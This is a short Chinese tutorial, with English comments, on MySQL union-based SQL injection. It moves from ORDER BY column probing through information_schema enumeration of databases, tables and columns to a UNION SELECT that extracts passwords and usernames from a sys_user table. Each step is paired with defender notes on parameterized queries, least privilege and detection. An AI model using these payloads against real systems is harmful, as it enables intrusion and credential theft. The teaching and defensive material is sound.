所谓的sql注入本质上还是执行sql语句
检测注入点
判断是否存在sql注入的可能
判断当前表有多少字段
利用order by n
-- Probe for the column count: ORDER BY 2 sorts by the 2nd column of the result set;
-- an n larger than the number of columns is a syntax-level error in MySQL.
-- Defender note: this probe only works when the database error is surfaced to the
-- client, so generic error pages and server-side-only logging remove the signal.
select * from tag order by 2;
order by n 按第n列排序，如果n大于表中字段个数则会报错。
爆库
-- The appended UNION SELECT has to return the same number of columns as `SELECT * FROM tag`
-- (two here, consistent with the ORDER BY probe above); database() is MySQL's
-- current-schema function, so its value is rendered in the 2nd column of the result.
-- Mitigation: bind `id` as a query parameter — a bound integer never reaches the parser as
-- SQL text, so the trailing `union select` cannot be appended.
SELECT * FROM `tag` where id = 3 union select 1,database();
查询information_schema数据库的schemata表，其中存放着mysql中所有数据库的名称
-- information_schema.schemata lists the databases visible to the connecting account.
-- Defender note: MySQL only shows information_schema rows for objects the account has
-- privileges on, so a least-privilege application account limits what this enumerates.
select schema_name from information_schema.schemata
爆表
-- Both statements read information_schema.tables. The first rides on the injectable `id`
-- predicate and packs every table name of the current schema (table_schema=database()) into
-- a single row with group_concat(); the second is the direct form for a named schema, where
-- the unqualified `TABLES` is resolved against the current default database.
-- Detection: the strings `information_schema`, `group_concat` and `union select` inside
-- request parameters are high-signal indicators for WAF rules and query-log alerting.
SELECT * FROM `tag` where id = 3 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
SELECT table_name FROM `TABLES` where table_schema = 'elementary'
爆字段
-- Column enumeration from information_schema.columns (written here as an unqualified
-- `COLUMNS`, resolved against the current default database). The second form also
-- filters on table_schema, because the same table name can exist in several schemas.
-- Defender note: a column literally named `password` is what the final UNION on this page
-- targets; storing salted password hashes rather than plaintext bounds the damage of a
-- successful extraction.
select column_name from COLUMNS where table_name = 'sys_user'
select column_name from COLUMNS where table_name = 'sys_user' and table_schema = 'elementary'
爆值
-- Final extraction: the UNION's two columns (`password`, user_name) line up with the two
-- columns of `tag`, so the credential values presumably appear wherever the application
-- renders tag rows — that is the reason the earlier ORDER BY probe fixed the column count.
-- Mitigation: a parameterized query stops the injection outright; beyond that, hashed
-- passwords and an application account without SELECT on sys_user limit what a successful
-- injection can yield.
SELECT * FROM `tag` where id = 3 UNION SELECT `password`,user_name from sys_user